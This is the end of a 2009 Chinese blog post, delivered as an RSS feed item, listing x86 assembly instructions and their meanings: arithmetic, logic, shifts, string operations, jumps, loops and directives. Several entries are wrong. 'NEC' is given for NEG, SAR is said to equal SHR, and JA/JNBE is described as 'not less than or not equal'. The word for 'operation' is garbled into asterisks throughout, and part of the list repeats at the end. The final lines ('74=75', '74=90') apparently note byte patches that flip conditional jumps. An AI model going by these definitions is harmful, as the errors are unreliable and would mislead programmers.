/>PUSHF 标志入栈.<br />POPF 标志出栈.<br />PUSHD 32位标志入栈.<br />POPD 32位标志出栈.<br />二、算术运算指令</p>
<p>　　ADD 加法.<br />ADC 带进位加法.<br />INC 加 1.<br />AAA 加法的ASCII码调整.<br />DAA 加法的十进制调整.<br />SUB 减法.<br />SBB 带借位减法.<br />DEC 减 1.<br />NEC 求反(以 0 减之).<br />CMP 比较.(两**作数作减法,仅修改标志位,不回送结果).<br />AAS 减法的ASCII码调整.<br />DAS 减法的十进制调整.<br />MUL 无符号乘法.<br />IMUL 整数乘法.<br />以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),<br />AAM 乘法的ASCII码调整.<br />DIV 无符号除法.<br />IDIV 整数除法.<br />以上两条,结果回送:<br />商回送AL,余数回送AH, (字节运算);<br />或 商回送AX,余数回送DX, (字运算).<br />AAD 除法的ASCII码调整.<br />CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)<br />CWD 字转换为双字. (把AX中的字的符号扩展到DX中去)<br />CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)<br />CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)</p>
<p>三、逻辑运算指令<br />　　AND 与运算.<br />OR 或运算.<br />XOR 异或运算.两者相等为0,不等为1.<br />NOT 取反.<br />TEST 测试.(两**作数作与运算,仅修改标志位,不回送结果).<br />SHL 逻辑左移.<br />SAL 算术左移.(=SHL)<br />SHR 逻辑右移.<br />SAR 算术右移.(=SHR)<br />ROL 循环左移.<br />ROR 循环右移.<br />RCL 通过进位的循环左移.<br />RCR 通过进位的循环右移.<br />以上八种移位指令,其移位次数可达255次.<br />移位一次时, 可直接用**作码. 如 SHL AX,1.<br />移位&gt;1次时, 则由寄存器CL给出移位次数.<br />如 MOV CL,04<br />SHL AX,CL</p>
<p>四、串指令<br />　DS:SI 源串段寄存器 :源串变址.<br />ES:DI 目标串段寄存器:目标串变址.<br />CX 重复次数计数器.<br />AL/AX 扫描值.<br />D标志 0表示重复**作中SI和DI应自动增量; 1表示应自动减量.<br />Z标志 用来控制扫描或比较**作的结束.<br />MOVS 串传送.<br />( MOVSB 传送字符. MOVSW 传送字. MOVSD 传送双字. )<br />CMPS 串比较.<br />( CMPSB 比较字符. CMPSW 比较字. )<br />SCAS 串扫描.<br />把AL或AX的内容与目标串作比较,比较结果反映在标志位.<br />LODS 装入串.<br />把源串中的元素(字或字节)逐一装入AL或AX中.<br />( LODSB 传送字符. LODSW 传送字. LODSD 传送双字. )<br />STOS 保存串.<br />是LODS的逆过程.<br />REP 当CX/ECX&lt;&gt;0时重复.<br />REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX&lt;&gt;0时重复.<br />REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX&lt;&gt;0时重复.<br />就是搜索目标字符，只到找等或者串结束才退出比较<br />ax/al 搜索数据<br />es:di 目标串<br />cx&nbsp;&nbsp; 串长度<br />df&nbsp;&nbsp; 方向标志<br />可以根据退出时的ZF位判断，是否在目标中</p>
<p><br />REPC 当CF=1且CX/ECX&lt;&gt;0时重复.<br />REPNC 当CF=0且CX/ECX&lt;&gt;0时重复.</p>
<p>五、程序转移指令<br />　1&gt;无条件转移指令 (长转移)<br />JMP 无条件转移指令<br />CALL 过程调用<br />RET/RETF过程返回.<br />2&gt;条件转移指令 (短转移,-128到+127的距离内)<br />( 当且仅当(SF XOR OF)=1时,OP1&lt;OP2 )<br />JA/JNBE 不小于或不等于时转移.<br />JAE/JNB 大于或等于转移.<br />JB/JNAE 小于转移.<br />JBE/JNA 小于或等于转移.<br />以上四条,测试无符号整数运算的结果(标志C和Z).<br />JG/JNLE 大于转移.<br />JGE/JNL 大于或等于转移.<br />JL/JNGE 小于转移.<br />JLE/JNG 小于或等于转移.<br />以上四条,测试带符号整数运算的结果(标志S,O和Z).<br />JE/JZ 等于转移.<br />JNE/JNZ 不等于时转移.<br />JC 有进位时转移.<br />JNC 无进位时转移.<br />JNO 不溢出时转移.<br />JNP/JPO 奇偶性为奇数时转移.<br />JNS 符号位为 &quot;0&quot; 时转移.<br />JO 溢出转移.<br />JP/JPE 奇偶性为偶数时转移.<br />JS 符号位为 &quot;1&quot; 时转移.<br />3&gt;循环控制指令(短转移)<br />LOOP CX不为零时循环.<br />LOOPE/LOOPZ CX不为零且标志Z=1时循环.<br />LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.<br />JCXZ CX为零时转移.<br />JECXZ ECX为零时转移.<br />4&gt;中断指令<br />INT 中断指令<br />INTO 溢出中断<br />IRET 中断返回<br />5&gt;处理器控制指令<br />HLT 处理器暂停, 直到出现中断或复位信号才继续.<br />WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.<br />ESC 转换到外处理器.<br />LOCK 封锁总线.<br />NOP 空**作.<br />STC 置进位标志位.<br />CLC 清进位标志位.<br />CMC 进位标志取反.<br />STD 置方向标志位.<br />CLD 清方向标志位.<br />STI 置中断允许位.<br />CLI 清中断允许位.</p>
<p>六、伪指令</p>
<p>　　DW 定义字(2字节).<br />PROC 定义过程.<br />ENDP 过程结束.<br />SEGMENT 定义段.<br />ASSUME 建立段寄存器寻址.<br />ENDS 段结束.<br />END 程序结束</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><br />　ADD 加法.<br />ADC 带进位加法<br />DAA 加法的十进制调整.<br />SUB 减法.<br />JA/JNBE 不小于或不等于时转移.<br />JAE/JNB 大于或等于转移.<br />JB/JNAE 小于转移.<br />JBE/JNA 小于或等于转移.<br />以上四条,测试无符号整数运算的结果(标志C和Z).<br />JG/JNLE 大于转移.<br />JGE/JNL 大于或等于转移.<br />JL/JNGE 小于转移.<br />JLE/JNG 小于或等于转移.<br />以上四条,测试带符号整数运算的结果(标志S,O和Z).<br />PUSH 把字压入堆栈<br />RET/RETF过程返回<br />PUSH 把字压入堆栈.<br />POP 把字弹出堆栈<br />74=75<br />74=90<br />1B=75</p>
<p>&nbsp;</p>
<p><br /></p>]]>
</description>
<guid isPermaLink="false">http://www.bokee.net/blogmodule/weblogcomment_viewEntry/3464830.html</guid>
<subject>最新动态</subject>
<author>xp0375</author>
<category>最新动态</category>
<pubDate>Sun, 05 Jul 2009 21:18:50 CST </pubDate>
</item>

</channel>
</rss>
